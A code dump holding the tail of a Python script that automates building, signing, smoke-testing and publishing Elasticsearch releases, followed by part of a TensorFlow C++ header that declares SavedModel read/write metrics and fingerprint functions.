    replacement = 'added[%s' % (release_version)
    pending_files = []
    def callback(line):
        return line.replace(pattern, replacement)
    for root, _, file_names in os.walk(path):
        for file_name in fnmatch.filter(file_names, '*.asciidoc'):
            full_path = os.path.join(root, file_name)
            # process_file returns True only when the file actually changed.
            if process_file(full_path, callback):
                pending_files.append(os.path.join(root, file_name))
    return pending_files
# Moves the pom.xml file from a snapshot to a release
def remove_maven_snapshot(pom, release):
    """Rewrite pom.xml in place, dropping the -SNAPSHOT suffix for *release*."""
    pattern = '<version>%s-SNAPSHOT</version>' % (release)
    replacement = '<version>%s</version>' % (release)
    def callback(line):
        return line.replace(pattern, replacement)
    process_file(pom, callback)

# Moves the Version.java file from a snapshot to a release
def remove_version_snapshot(version_file, release):
    """Flip the snapshot flag for *release* in Version.java (true -> false)."""
    # 1.0.0.Beta1 -> 1_0_0_Beta1
    release = release.replace('.', '_')
    pattern = 'new Version(V_%s_ID, true' % (release)
    replacement = 'new Version(V_%s_ID, false' % (release)
    def callback(line):
        return line.replace(pattern, replacement)
    process_file(version_file, callback)
# Stages the given files for the next git commit
def add_pending_files(*files):
    """git-add each given path."""
    for file in files:
        run('git add %s' % (file))

# Executes a git commit with 'release [version]' as the commit message
def commit_release(release):
    run('git commit -m "release [%s]"' % release)

def commit_feature_flags(release):
    """Commit the documentation feature-flag updates for *release*."""
    run('git commit -m "Update Documentation Feature Flags [%s]"' % release)

def tag_release(release):
    """Create an annotated tag v<release> at the current HEAD."""
    run('git tag -a v%s -m "Tag release version %s"' % (release, release))

def run_mvn(*cmd):
    """Run each maven invocation with the configured JDK exported."""
    for c in cmd:
        run('%s; %s %s' % (java_exe(), MVN, c))
def build_release(release_version, run_tests=False, dry_run=True, cpus=1, bwc_version=None):
    """Run the maven build for *release_version*.

    Optionally runs the test suites first (plus backwards-compatibility tests
    when *bwc_version* is given), then builds and signs the distribution
    packages.  A dry run only packages; a real run deploys.
    """
    target = 'deploy'
    if dry_run:
        target = 'package'
    if run_tests:
        run_mvn('clean',
                'test -Dtests.jvms=%s -Des.node.mode=local' % (cpus),
                'test -Dtests.jvms=%s -Des.node.mode=network' % (cpus))
    if bwc_version:
        print('Running Backwards compatibility tests against version [%s]' % (bwc_version))
        run_mvn('clean', 'test -Dtests.filter=@backwards -Dtests.bwc.version=%s -Dtests.bwc=true -Dtests.jvms=1' % bwc_version)
    run_mvn('clean test-compile -Dforbidden.test.signatures="org.apache.lucene.util.LuceneTestCase\$AwaitsFix @ Please fix all bugs before release"')
    # dont sign the RPM, so older distros will be able to use the uploaded RPM package
    gpg_args = '-Dgpg.key="%s" -Dgpg.passphrase="%s" -Ddeb.sign=true -Drpm.sign=false' % (env.get('GPG_KEY_ID'), env.get('GPG_PASSPHRASE'))
    if env.get('GPG_KEYRING'):
        gpg_args += ' -Dgpg.keyring="%s"' % env.get('GPG_KEYRING')
    run_mvn('clean %s -DskipTests %s' % (target, gpg_args))
    success = False
    try:
        # create additional signed RPM for the repositories
        run_mvn('-f distribution/rpm/pom.xml package -DskipTests -Dsign.rpm=true -Drpm.outputDirectory=target/releases/signed/ %s' % (gpg_args))
        rpm = os.path.join('target/releases/signed', 'elasticsearch-%s.rpm' % release_version)
        if os.path.isfile(rpm):
            log('Signed RPM [%s] contains: ' % rpm)
            run('rpm -pqli %s' % rpm)
        success = True
    finally:
        if not success:
            # typo fixes: "Bulding" -> "Building", "on of" -> "one of"
            print("""
RPM Building failed make sure "rpm" tools are installed.
Use one of the following commands to install:
$ brew install rpm # on OSX
$ apt-get install rpm # on Ubuntu et.al
""")
# Uses the github API to fetch open tickets for the given release version
# if it finds any tickets open for that version it will throw an exception
def ensure_no_open_tickets(version):
    """Raise RuntimeError if GitHub still has open issues labelled v<version>.

    Network failures (socket.error) are logged and tolerated, since the
    label might simply not exist yet.
    """
    version = "v%s" % version
    conn = HTTPSConnection('api.github.com')
    try:
        log('Checking for open tickets on Github for version %s' % version)
        log('Check if node is available')
        conn.request('GET', '/repos/elastic/elasticsearch/issues?state=open&labels=%s' % version, headers= {'User-Agent' : 'Elasticsearch version checker'})
        res = conn.getresponse()
        if res.status == 200:
            issues = json.loads(res.read().decode("utf-8"))
            if issues:
                urls = [issue['html_url'] for issue in issues]
                raise RuntimeError('Found open issues for release version %s:\n%s' % (version, '\n'.join(urls)))
            else:
                log("No open issues found for version %s" % version)
        else:
            raise RuntimeError('Failed to fetch issue list from Github for release version %s' % version)
    except socket.error as e:
        # BUG FIX: the original message contained a stray "' % version" fragment
        # left over from an earlier format expression.
        log("Failed to fetch issue list from Github for release version %s - Exception: [%s]" % (version, e))
        # that is ok it might not be there yet
    finally:
        conn.close()
def wait_for_node_startup(host='127.0.0.1', port=9200, timeout=15):
    """Poll the node's HTTP port once per second for up to *timeout* tries.

    Returns True as soon as the node answers with HTTP 200, False otherwise.
    """
    for _ in range(timeout):
        conn = HTTPConnection(host, port, timeout)
        try:
            log('Waiting until node becomes available for 1 second')
            time.sleep(1)
            log('Check if node is available')
            conn.request('GET', '')
            if conn.getresponse().status == 200:
                return True
        except socket.error as e:
            log("Failed while waiting for node - Exception: [%s]" % e)
            # that is ok it might not be there yet
        finally:
            conn.close()
    return False
# Ensures we are using a true Lucene release, not a snapshot build:
def verify_lucene_version():
    """Validate that pom.xml references a released (non-snapshot) Lucene.

    Raises RuntimeError when a snapshot repository is configured, a version
    element is missing, or lucene.version != lucene.maven.version.
    """
    # BUG FIX: use a context manager so the file handle is not leaked.
    with open('pom.xml', encoding='utf-8') as pom:
        s = pom.read()
    if 'download.elastic.co/lucenesnapshots' in s:
        raise RuntimeError('pom.xml contains download.elastic.co/lucenesnapshots repository: remove that before releasing')
    m = re.search(r'<lucene.version>(.*?)</lucene.version>', s)
    if m is None:
        raise RuntimeError('unable to locate lucene.version in pom.xml')
    lucene_version = m.group(1)
    m = re.search(r'<lucene.maven.version>(.*?)</lucene.maven.version>', s)
    if m is None:
        raise RuntimeError('unable to locate lucene.maven.version in pom.xml')
    lucene_maven_version = m.group(1)
    if lucene_version != lucene_maven_version:
        raise RuntimeError('pom.xml is still using a snapshot release of lucene (%s): cutover to a real lucene release before releasing' % lucene_maven_version)
# Checks the pom.xml for the release version.
# This method fails if the pom file has no SNAPSHOT version set ie.
# if the version is already on a release version we fail.
# Returns the next version string ie. 0.90.7
def find_release_version(src_branch):
    """Return the version (minus -SNAPSHOT) declared in pom.xml on *src_branch*."""
    run('git checkout %s' % src_branch)
    snapshot_re = re.compile(r'<version>(.+)-SNAPSHOT</version>')
    with open('pom.xml', encoding='utf-8') as pom:
        for line in pom:
            match = snapshot_re.search(line)
            if match:
                return match.group(1)
    raise RuntimeError('Could not find release version in branch %s' % src_branch)
def artifact_names(release):
    """Return the expected distribution artifact paths for *release*."""
    layout = (
        ('distribution/zip/target/releases', 'elasticsearch-%s.zip'),
        ('distribution/tar/target/releases', 'elasticsearch-%s.tar.gz'),
        ('distribution/deb/target/releases', 'elasticsearch-%s.deb'),
        ('distribution/rpm/target/releases', 'elasticsearch-%s.rpm'),
    )
    return [os.path.join(directory, template % (release)) for directory, template in layout]
def get_artifacts(release):
    """Return the artifact paths for *release*, failing if any file is missing."""
    expected = artifact_names(release)
    missing = [f for f in expected if not os.path.isfile(f)]
    if missing:
        # report the first missing artifact, matching the original behaviour
        raise RuntimeError('Could not find required artifact at %s' % missing[0])
    return expected
# Sample URL:
# http://download.elasticsearch.org/elasticsearch/release/org/elasticsearch/distribution/elasticsearch-rpm/2.0.0-beta1-SNAPSHOT/elasticsearch-rpm-2.0.0-beta1-SNAPSHOT.rpm
def download_and_verify(release, files, plugins=None, base_url='https://download.elastic.co/elasticsearch/release/org/elasticsearch/distribution'):
    """Download the published artifacts for *release*, verify checksums, smoke test.

    files   -- artifact paths; only the basename is used to build the URL
    plugins -- (name, plugin) pairs forwarded to smoke_test_release
    """
    print('Downloading and verifying release %s from %s' % (release, base_url))
    tmp_dir = tempfile.mkdtemp()
    try:
        downloaded_files = []
        for file in files:
            name = os.path.basename(file)
            if name.endswith('tar.gz'):
                url = '%s/tar/elasticsearch/%s/%s' % (base_url, release, name)
            elif name.endswith('zip'):
                url = '%s/zip/elasticsearch/%s/%s' % (base_url, release, name)
            elif name.endswith('rpm'):
                url = '%s/rpm/elasticsearch/%s/%s' % (base_url, release, name)
            elif name.endswith('deb'):
                url = '%s/deb/elasticsearch/%s/%s' % (base_url, release, name)
            else:
                # BUG FIX: previously `url` stayed unbound here (NameError) or
                # silently reused the previous iteration's value - fail loudly.
                raise RuntimeError('Unknown artifact type for file [%s]' % name)
            abs_file_path = os.path.join(tmp_dir, name)
            print(' Downloading %s' % (url))
            downloaded_files.append(abs_file_path)
            urllib.request.urlretrieve(url, abs_file_path)
            url = ''.join([url, '.sha1'])
            # NOTE: abs_file_path is absolute, so os.path.join just returns
            # abs_file_path + '.sha1' here - kept for behavioural parity.
            checksum_file = os.path.join(tmp_dir, ''.join([abs_file_path, '.sha1']))
            urllib.request.urlretrieve(url, checksum_file)
            print(' Verifying checksum %s' % (checksum_file))
            run('cd %s && sha1sum -c %s' % (tmp_dir, os.path.basename(checksum_file)))
        smoke_test_release(release, downloaded_files, get_tag_hash('v%s' % release), plugins)
        print(' SUCCESS')
    finally:
        shutil.rmtree(tmp_dir)
def smoke_test_release(release, files, expected_hash, plugins):
    """Extract each package, start a node, and sanity-check the running cluster.

    For every extractable package (tar.gz / zip) this installs the given
    (name, plugin) pairs, starts a daemonized node, verifies the reported
    version number / build hash, runs the REST spec tests, confirms the
    plugins appear in /_nodes, then shuts the node down and cleans up.
    Raises RuntimeError on any mismatch or missing file.
    """
    for release_file in files:
        if not os.path.isfile(release_file):
            raise RuntimeError('Smoketest failed missing file %s' % (release_file))
        tmp_dir = tempfile.mkdtemp()
        if release_file.endswith('tar.gz'):
            run('tar -xzf %s -C %s' % (release_file, tmp_dir))
        elif release_file.endswith('zip'):
            run('unzip %s -d %s' % (release_file, tmp_dir))
        else:
            # rpm/deb packages are not extracted here
            log('Skip SmokeTest for [%s]' % release_file)
            continue # nothing to do here
        es_run_path = os.path.join(tmp_dir, 'elasticsearch-%s' % (release), 'bin/elasticsearch')
        print(' Smoke testing package [%s]' % release_file)
        es_plugin_path = os.path.join(tmp_dir, 'elasticsearch-%s' % (release),'bin/plugin')
        # remember installed plugin names so they can be checked off below
        plugin_names = {}
        for name, plugin in plugins:
            print(' Install plugin [%s] from [%s]' % (name, plugin))
            run('%s; %s install %s' % (java_exe(), es_plugin_path, plugin))
            plugin_names[name] = True
        background = '-d'  # run the node daemonized
        print(' Starting elasticsearch deamon from [%s]' % os.path.join(tmp_dir, 'elasticsearch-%s' % release))
        run('%s; %s -Des.node.name=smoke_tester -Des.cluster.name=prepare_release -Des.discovery.zen.ping.multicast.enabled=false -Des.script.inline=on -Des.script.indexed=on %s'
            % (java_exe(), es_run_path, background))
        conn = HTTPConnection('127.0.0.1', 9200, 20);
        wait_for_node_startup()
        try:
            try:
                conn.request('GET', '')
                res = conn.getresponse()
                if res.status == 200:
                    version = json.loads(res.read().decode("utf-8"))['version']
                    if release != version['number']:
                        raise RuntimeError('Expected version [%s] but was [%s]' % (release, version['number']))
                    if version['build_snapshot']:
                        raise RuntimeError('Expected non snapshot version')
                    if version['build_hash'].strip() != expected_hash:
                        raise RuntimeError('HEAD hash does not match expected [%s] but got [%s]' % (expected_hash, version['build_hash']))
                    print(' Running REST Spec tests against package [%s]' % release_file)
                    run_mvn('test -Dtests.cluster=%s -Dtests.jvms=1 -Dtests.class=*.*RestTests' % ("127.0.0.1:9300"))
                    print(' Verify if plugins are listed in _nodes')
                    conn.request('GET', '/_nodes?plugin=true&pretty=true')
                    res = conn.getresponse()
                    if res.status == 200:
                        nodes = json.loads(res.read().decode("utf-8"))['nodes']
                        for _, node in nodes.items():
                            node_plugins = node['plugins']
                            for node_plugin in node_plugins:
                                if not plugin_names.get(node_plugin['name'], False):
                                    raise RuntimeError('Unexpeced plugin %s' % node_plugin['name'])
                                del plugin_names[node_plugin['name']]
                        if plugin_names:
                            raise RuntimeError('Plugins not loaded %s' % list(plugin_names.keys()))
                    else:
                        raise RuntimeError('Expected HTTP 200 but got %s' % res.status)
                else:
                    raise RuntimeError('Expected HTTP 200 but got %s' % res.status)
            finally:
                # always attempt to shut the node down, even on failure
                conn.request('POST', '/_cluster/nodes/_local/_shutdown')
                time.sleep(1) # give the node some time to shut down
                if conn.getresponse().status != 200:
                    # NOTE(review): `res` here is the last GET response, not the
                    # shutdown response - the status reported below may be stale.
                    raise RuntimeError('Expected HTTP 200 but got %s on node shutdown' % res.status)
        finally:
            conn.close()
            shutil.rmtree(tmp_dir)
def merge_tag_push(remote, src_branch, release_version, dry_run):
    """Merge the release branch back into *src_branch*, tag it, and push both."""
    run('git checkout %s' % src_branch)
    run('git merge %s' % release_branch(release_version))
    run('git tag v%s' % release_version)
    if dry_run:
        print(' dryrun [True] -- skipping push to remote %s' % remote)
    else:
        run('git push %s %s' % (remote, src_branch)) # push the commit
        run('git push %s v%s' % (remote, release_version)) # push the tag
def publish_repositories(version, dry_run=True):
    """Trigger the deb/rpm package repository update for *version*.

    *version* is the source branch name (e.g. '1.5', '2.0').  BUG FIX: the
    body previously read the module-global ``src_branch`` instead of this
    parameter (a NameError when called standalone); callers pass the branch
    as *version*, so behaviour is unchanged for the existing call site.
    """
    if dry_run:
        print('Skipping package repository update')
    else:
        print('Triggering repository update for version %s - calling dev-tools/build_repositories.sh %s' % (version, version))
        # version is a branch name like 1.5/1.6/2.0/etc.. so we can use it directly
        run('dev-tools/build_repositories.sh %s' % version)
def print_sonatype_notice():
    """Print a warning when ~/.m2/settings.xml lacks sonatype credentials."""
    settings = os.path.join(os.path.expanduser('~'), '.m2/settings.xml')
    if os.path.isfile(settings):
        with open(settings, encoding='utf-8') as settings_file:
            for line in settings_file:
                # the snapshots server id is our indicator that credentials exist
                if line.strip() == '<id>sonatype-nexus-snapshots</id>':
                    return
    print("""
NOTE: No sonatype settings detected, make sure you have configured
your sonatype credentials in '~/.m2/settings.xml':
<settings>
...
<servers>
<server>
<id>sonatype-nexus-snapshots</id>
<username>your-jira-id</username>
<password>your-jira-pwd</password>
</server>
<server>
<id>sonatype-nexus-staging</id>
<username>your-jira-id</username>
<password>your-jira-pwd</password>
</server>
</servers>
...
</settings>
""")
def check_command_exists(name, cmd):
    """Probe *cmd* via the shell; raise RuntimeError if it exits non-zero."""
    try:
        subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT)
    except subprocess.CalledProcessError:
        message = 'Could not run command %s - please make sure it is installed' % (name)
        raise RuntimeError(message)
# Files rewritten when moving the tree from a SNAPSHOT to a release version.
VERSION_FILE = 'src/main/java/org/elasticsearch/Version.java'
POM_FILE = 'pom.xml'
# finds the highest available bwc version to test against
def find_bwc_version(release_version, bwc_dir='backwards'):
    """Pick the highest elasticsearch-* version in *bwc_dir* strictly below *release_version*."""
    log(' Lookup bwc version in directory [%s]' % bwc_dir)
    bwc_version = None
    if os.path.exists(bwc_dir) and os.path.isdir(bwc_dir):
        max_version = [int(x) for x in release_version.split('.')]
        prefix = 'elasticsearch-'
        for entry in os.listdir(bwc_dir):
            # avoid shadowing builtin `dir`; only elasticsearch-* directories count
            if not (os.path.isdir(os.path.join(bwc_dir, entry)) and entry.startswith(prefix)):
                continue
            candidate = [int(x) for x in entry[len(prefix):].split('.')]
            if candidate < max_version: # bwc tests only against smaller versions
                if (not bwc_version) or candidate > [int(x) for x in bwc_version.split('.')]:
                    bwc_version = entry[len(prefix):]
        log(' Using bwc version [%s]' % bwc_version)
    else:
        log(' bwc directory [%s] does not exists or is not a directory - skipping' % bwc_dir)
    return bwc_version
def ensure_checkout_is_clean(branchName):
    """Abort unless the git checkout is clean, on *branchName*, and in sync with origin."""
    # Make sure no local mods:
    diff_stat = subprocess.check_output('git diff --shortstat', shell=True)
    if len(diff_stat) > 0:
        raise RuntimeError('git diff --shortstat is non-empty: got:\n%s' % diff_stat)
    # Make sure no untracked files:
    status = subprocess.check_output('git status', shell=True).decode('utf-8', errors='replace')
    if 'Untracked files:' in status:
        raise RuntimeError('git status shows untracked files: got:\n%s' % status)
    # Make sure we are on the right branch (NOTE: a bit weak, since we default to current branch):
    if 'On branch %s' % branchName not in status:
        raise RuntimeError('git status does not show branch %s: got:\n%s' % (branchName, status))
    # Make sure we have all changes from origin:
    if 'is behind' in status:
        raise RuntimeError('git status shows not all changes pulled from origin; try running "git pull origin %s": got:\n%s' % (branchName, status))
    # Make sure we have no local unpushed changes (this is supposed to be a clean area):
    if 'is ahead' in status:
        raise RuntimeError('git status shows local commits; try running "git fetch origin", "git checkout %s", "git reset --hard origin/%s": got:\n%s' % (branchName, branchName, status))
# Checks all source files for //NORELEASE comments
def check_norelease(path='src'):
    """Raise RuntimeError if any .java file under *path* contains 'norelease'."""
    pattern = re.compile(r'\bnorelease\b', re.IGNORECASE)
    for root, _, file_names in os.walk(path):
        for file_name in fnmatch.filter(file_names, '*.java'):
            full_path = os.path.join(root, file_name)
            with open(full_path, 'r', encoding='utf-8') as current_file:
                for line_number, line in enumerate(current_file, start=1):
                    if pattern.search(line):
                        raise RuntimeError('Found //norelease comment in %s line %s' % (full_path, line_number))
def run_and_print(text, run_function):
    """Run *run_function*, printing OK/NOT OK after *text*; return success flag."""
    print(text, end='')
    try:
        run_function()
    except RuntimeError:
        print(COLOR_FAIL + 'NOT OK' + COLOR_END)
        return False
    print(COLOR_OK + 'OK' + COLOR_END)
    return True
def check_env_var(text, env_var):
    """Print OK/NOT OK depending on whether *env_var* is set; return the result."""
    print(text, end='')
    if env_var in env:
        print(COLOR_OK + 'OK' + COLOR_END)
        return True
    print(COLOR_FAIL + 'NOT OK' + COLOR_END)
    return False
def check_environment_and_commandline_tools(check_only):
    """Verify the env vars and command line tools required for a release.

    Exits 0 when *check_only* was requested; exits non-zero when any check
    failed.  BUG FIX: failing checks previously exited with status 0, which
    reported success to the calling shell/CI.
    """
    checks = list()
    checks.append(check_env_var('Checking for AWS env configuration AWS_SECRET_ACCESS_KEY_ID... ', 'AWS_SECRET_ACCESS_KEY'))
    checks.append(check_env_var('Checking for AWS env configuration AWS_ACCESS_KEY_ID... ', 'AWS_ACCESS_KEY_ID'))
    checks.append(check_env_var('Checking for SONATYPE env configuration SONATYPE_USERNAME... ', 'SONATYPE_USERNAME'))
    checks.append(check_env_var('Checking for SONATYPE env configuration SONATYPE_PASSWORD... ', 'SONATYPE_PASSWORD'))
    checks.append(check_env_var('Checking for GPG env configuration GPG_KEY_ID... ', 'GPG_KEY_ID'))
    checks.append(check_env_var('Checking for GPG env configuration GPG_PASSPHRASE... ', 'GPG_PASSPHRASE'))
    checks.append(check_env_var('Checking for S3 repo upload env configuration S3_BUCKET_SYNC_TO... ', 'S3_BUCKET_SYNC_TO'))
    checks.append(check_env_var('Checking for git env configuration GIT_AUTHOR_NAME... ', 'GIT_AUTHOR_NAME'))
    checks.append(check_env_var('Checking for git env configuration GIT_AUTHOR_EMAIL... ', 'GIT_AUTHOR_EMAIL'))
    checks.append(run_and_print('Checking command: rpm... ', partial(check_command_exists, 'rpm', 'rpm --version')))
    checks.append(run_and_print('Checking command: dpkg... ', partial(check_command_exists, 'dpkg', 'dpkg --version')))
    checks.append(run_and_print('Checking command: gpg... ', partial(check_command_exists, 'gpg', 'gpg --version')))
    checks.append(run_and_print('Checking command: expect... ', partial(check_command_exists, 'expect', 'expect -v')))
    checks.append(run_and_print('Checking command: createrepo... ', partial(check_command_exists, 'createrepo', 'createrepo --version')))
    checks.append(run_and_print('Checking command: s3cmd... ', partial(check_command_exists, 's3cmd', 's3cmd --version')))
    checks.append(run_and_print('Checking command: apt-ftparchive... ', partial(check_command_exists, 'apt-ftparchive', 'apt-ftparchive --version')))
    # boto, check error code being returned
    location = os.path.dirname(os.path.realpath(__file__))
    command = 'python %s/upload-s3.py -h' % (location)
    checks.append(run_and_print('Testing boto python dependency... ', partial(check_command_exists, 'python-boto', command)))
    checks.append(run_and_print('Checking java version... ', partial(verify_java_version, '1.7')))
    checks.append(run_and_print('Checking java mvn version... ', partial(verify_mvn_java_version, '1.7', MVN)))
    if check_only:
        sys.exit(0)
    if False in checks:
        print("Exiting due to failing checks")
        sys.exit(1)  # BUG FIX: was sys.exit(0), masking the failure
if __name__ == '__main__':
    # Command-line driver for cutting (or smoke-testing) an Elasticsearch release.
    parser = argparse.ArgumentParser(description='Builds and publishes a Elasticsearch Release')
    parser.add_argument('--branch', '-b', metavar='RELEASE_BRANCH', default=get_current_branch(),
                        help='The branch to release from. Defaults to the current branch.')
    parser.add_argument('--cpus', '-c', metavar='1', default=1,
                        help='The number of cpus to use for running the test. Default is [1]')
    parser.add_argument('--skiptests', '-t', dest='tests', action='store_false',
                        help='Skips tests before release. Tests are run by default.')
    parser.set_defaults(tests=True)
    parser.add_argument('--remote', '-r', metavar='origin', default='origin',
                        help='The remote to push the release commit and tag to. Default is [origin]')
    parser.add_argument('--publish', '-d', dest='dryrun', action='store_false',
                        help='Publishes the release. Disable by default.')
    parser.add_argument('--smoke', '-s', dest='smoke', default='',
                        help='Smoke tests the given release')
    parser.add_argument('--bwc', '-w', dest='bwc', metavar='backwards', default='backwards',
                        help='Backwards compatibility version path to use to run compatibility tests against')
    parser.add_argument('--check-only', dest='check_only', action='store_true',
                        help='Checks and reports for all requirements and then exits')
    parser.set_defaults(dryrun=True)
    parser.set_defaults(smoke=None)
    parser.set_defaults(check_only=False)
    args = parser.parse_args()
    bwc_path = args.bwc
    src_branch = args.branch
    remote = args.remote
    run_tests = args.tests
    dry_run = args.dryrun
    cpus = args.cpus
    # no --smoke given means we do a full build; otherwise only smoke-test
    build = not args.smoke
    smoke_test_version = args.smoke
    check_environment_and_commandline_tools(args.check_only)
    # we print a notice if we can not find the relevant infos in the ~/.m2/settings.xml
    print_sonatype_notice()
    # we require to build with 1.7
    verify_java_version('1.7')
    verify_mvn_java_version('1.7', MVN)
    if os.path.exists(LOG):
        raise RuntimeError('please remove old release log %s first' % LOG)
    if not dry_run:
        print('WARNING: dryrun is set to "false" - this will push and publish the release')
        input('Press Enter to continue...')
    print(''.join(['-' for _ in range(80)]))
    print('Preparing Release from branch [%s] running tests: [%s] dryrun: [%s]' % (src_branch, run_tests, dry_run))
    print(' JAVA_HOME is [%s]' % JAVA_HOME)
    print(' Running with maven command: [%s] ' % (MVN))
    if build:
        # full release: validate the tree, branch, build, smoke test, tag, push
        check_norelease(path='src')
        ensure_checkout_is_clean(src_branch)
        verify_lucene_version()
        release_version = find_release_version(src_branch)
        ensure_no_open_tickets(release_version)
        if not dry_run:
            smoke_test_version = release_version
        head_hash = get_head_hash()
        run_mvn('clean') # clean the env!
        print(' Release version: [%s]' % release_version)
        create_release_branch(remote, src_branch, release_version)
        print(' Created release branch [%s]' % (release_branch(release_version)))
        success = False
        try:
            pending_files = [POM_FILE, VERSION_FILE]
            remove_maven_snapshot(POM_FILE, release_version)
            remove_version_snapshot(VERSION_FILE, release_version)
            print(' Done removing snapshot version')
            add_pending_files(*pending_files) # expects var args use * to expand
            commit_release(release_version)
            pending_files = update_reference_docs(release_version)
            version_head_hash = None
            # split commits for docs and version to enable easy cherry-picking
            if pending_files:
                add_pending_files(*pending_files) # expects var args use * to expand
                commit_feature_flags(release_version)
                version_head_hash = get_head_hash()
            print(' Committed release version [%s]' % release_version)
            print(''.join(['-' for _ in range(80)]))
            print('Building Release candidate')
            input('Press Enter to continue...')
            if not dry_run:
                print(' Running maven builds now and publish to Sonatype and S3 - run-tests [%s]' % run_tests)
            else:
                print(' Running maven builds now run-tests [%s]' % run_tests)
            build_release(release_version, run_tests=run_tests, dry_run=dry_run, cpus=cpus, bwc_version=find_bwc_version(release_version, bwc_path))
            artifacts = get_artifacts(release_version)
            smoke_test_release(release_version, artifacts, get_head_hash(), PLUGINS)
            print(''.join(['-' for _ in range(80)]))
            print('Finish Release -- dry_run: %s' % dry_run)
            input('Press Enter to continue...')
            print(' merge release branch, tag and push to %s %s -- dry_run: %s' % (remote, src_branch, dry_run))
            merge_tag_push(remote, src_branch, release_version, dry_run)
            print(' Updating package repositories -- dry_run: %s' % dry_run)
            publish_repositories(src_branch, dry_run=dry_run)
            cherry_pick_command = '.'
            if version_head_hash:
                cherry_pick_command = ' and cherry-pick the documentation changes: \'git cherry-pick %s\' to the development branch' % (version_head_hash)
            pending_msg = """
Release successful pending steps:
* create a new vX.Y.Z label on github for the next release, with label color #dddddd (https://github.com/elastic/elasticsearch/labels)
* publish the maven artifacts on Sonatype: https://oss.sonatype.org/index.html
- here is a guide: http://central.sonatype.org/pages/releasing-the-deployment.html
* check if the release is there https://oss.sonatype.org/content/repositories/releases/org/elasticsearch/elasticsearch/%(version)s
* announce the release on the website / blog post
* tweet about the release
* announce the release in the google group/mailinglist
* Move to a Snapshot version to the current branch for the next point release%(cherry_pick)s
"""
            print(pending_msg % { 'version' : release_version, 'cherry_pick' : cherry_pick_command} )
            success = True
        finally:
            # roll the working copy back on failure; on dry runs undo everything
            if not success:
                run('git reset --hard HEAD')
                run('git checkout %s' % src_branch)
            elif dry_run:
                run('git reset --hard %s' % head_hash)
                run('git tag -d v%s' % release_version)
            # we delete this one anyways
            run('git branch -D %s' % (release_branch(release_version)))
    else:
        print("Skipping build - smoketest only against version %s" % smoke_test_version)
        run_mvn('clean') # clean the env!
    if smoke_test_version:
        # download the published artifacts and smoke test them
        fetch(remote)
        download_and_verify(smoke_test_version, artifact_names(smoke_test_version), plugins=PLUGINS)
|
unknown
|
codeparrot/codeparrot-clean
| ||
/* Copyright 2021 The TensorFlow Authors. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
==============================================================================*/
// APIs for accessing SavedModel and checkpoint metric objects.
//
// In order to collect the data from these metrics, please add the metrics to
// the provided monitoring platform. Unless configured with a user-specified
// monitoring platform, the data is not collected in OSS.
#ifndef TENSORFLOW_CC_SAVED_MODEL_METRICS_H_
#define TENSORFLOW_CC_SAVED_MODEL_METRICS_H_
#include <cstdint>
#include <string>
#include <utility>
#include "absl/status/statusor.h"
#include "absl/strings/string_view.h"
#include "tensorflow/core/lib/monitoring/counter.h"
#include "tensorflow/core/lib/monitoring/gauge.h"
#include "tensorflow/core/lib/monitoring/sampler.h"
#include "tensorflow/core/protobuf/fingerprint.pb.h"
namespace tensorflow {
namespace metrics {
// Possible values written to the SavedModelFoundFingerprintOnLoad gauge.
const char kFingerprintFound[] = "FOUND";
const char kFingerprintNotFound[] = "NOT_FOUND";
const char kFingerprintError[] = "ERROR";
// Returns "/tensorflow/core/saved_model/write/count" cell. This metric
// has 1 field "write_version", which is equal to the
// `tensorflow::libexport::GetWriteVersion` of the protobuf and should be
// incremented when a SavedModel has been successfully written.
monitoring::CounterCell& SavedModelWriteCount(absl::string_view write_version);
// Returns "/tensorflow/core/saved_model/read/count" cell. This metric
// has 1 field "write_version", which is equal to the
// `tensorflow::libexport::GetWriteVersion` of the protobuf, and should be
// incremented when a SavedModel has been successfully read.
monitoring::CounterCell& SavedModelReadCount(absl::string_view write_version);
// Returns "/tensorflow/core/saved_model/write/api" cell. This metric has 1
// field "api_label" which corresponds to a SavedModel write API. The cell for
// `foo` should be incremented when the write API `foo` is called.
monitoring::CounterCell& SavedModelWriteApi(absl::string_view api_label);
// Returns "/tensorflow/core/saved_model/read/api" cell. This metric has 1
// field "api_label" which corresponds to a SavedModel read API. The cell for
// `foo` should be incremented when the read API `foo` is called.
monitoring::CounterCell& SavedModelReadApi(absl::string_view api_label);
// Returns "/tensorflow/core/saved_model/write/fingerprint" cell, which contains
// the saved_model_checksum of the SM's fingerprint when it is exported.
monitoring::GaugeCell<std::string>& SavedModelWriteFingerprint();
// Returns "/tensorflow/core/saved_model/write/path" cell, which contains
// the saved_model_path of the SM when it is exported.
monitoring::GaugeCell<std::string>& SavedModelWritePath();
// Returns "/tensorflow/core/saved_model/write/path_and_fingerprint" cell, which
// contains the path (saved_model_path) and fingerprint (concatenation of
// graph_def_program_hash, signature_def_hash, saved_object_graph_hash,
// and checkpoint_hash) of the SavedModel when it is exported.
monitoring::GaugeCell<std::string>& SavedModelWritePathAndSingleprint();
// Returns "/tensorflow/core/saved_model/read/fingerprint" cell, which contains
// the saved_model_checksum of the SM's fingerprint when it is imported.
monitoring::GaugeCell<std::string>& SavedModelReadFingerprint();
// Returns "/tensorflow/core/saved_model/read/path" cell, which contains
// the saved_model_path of the SM when it is imported.
monitoring::GaugeCell<std::string>& SavedModelReadPath();
// Returns "/tensorflow/core/saved_model/read/path_and_fingerprint" cell, which
// contains the path (saved_model_path) and singleprint (concatenation of
// graph_def_program_hash, signature_def_hash, saved_object_graph_hash,
// and checkpoint_hash) of the SavedModel when it is imported.
monitoring::GaugeCell<std::string>& SavedModelReadPathAndSingleprint();
// Returns the fingerprint as a Json string.
std::string MakeFingerprintJson(FingerprintDef fingerprint_def);
// Returns canonical string concatenation of path and singleprint.
absl::StatusOr<std::string> MakeSavedModelPathAndSingleprint(
    std::string path, std::string singleprint);
// Returns path and singleprint as a pair, parsed canonically from the string
// metric.
absl::StatusOr<std::pair<std::string, std::string>>
ParseSavedModelPathAndSingleprint(std::string path_and_singleprint);
// Returns string status indicating whether or not the fingerprint.pb file was
// found when loading the SavedModel. One of kFingerprintFound,
// kFingerprintNotFound, or kFingerprintError (declared above).
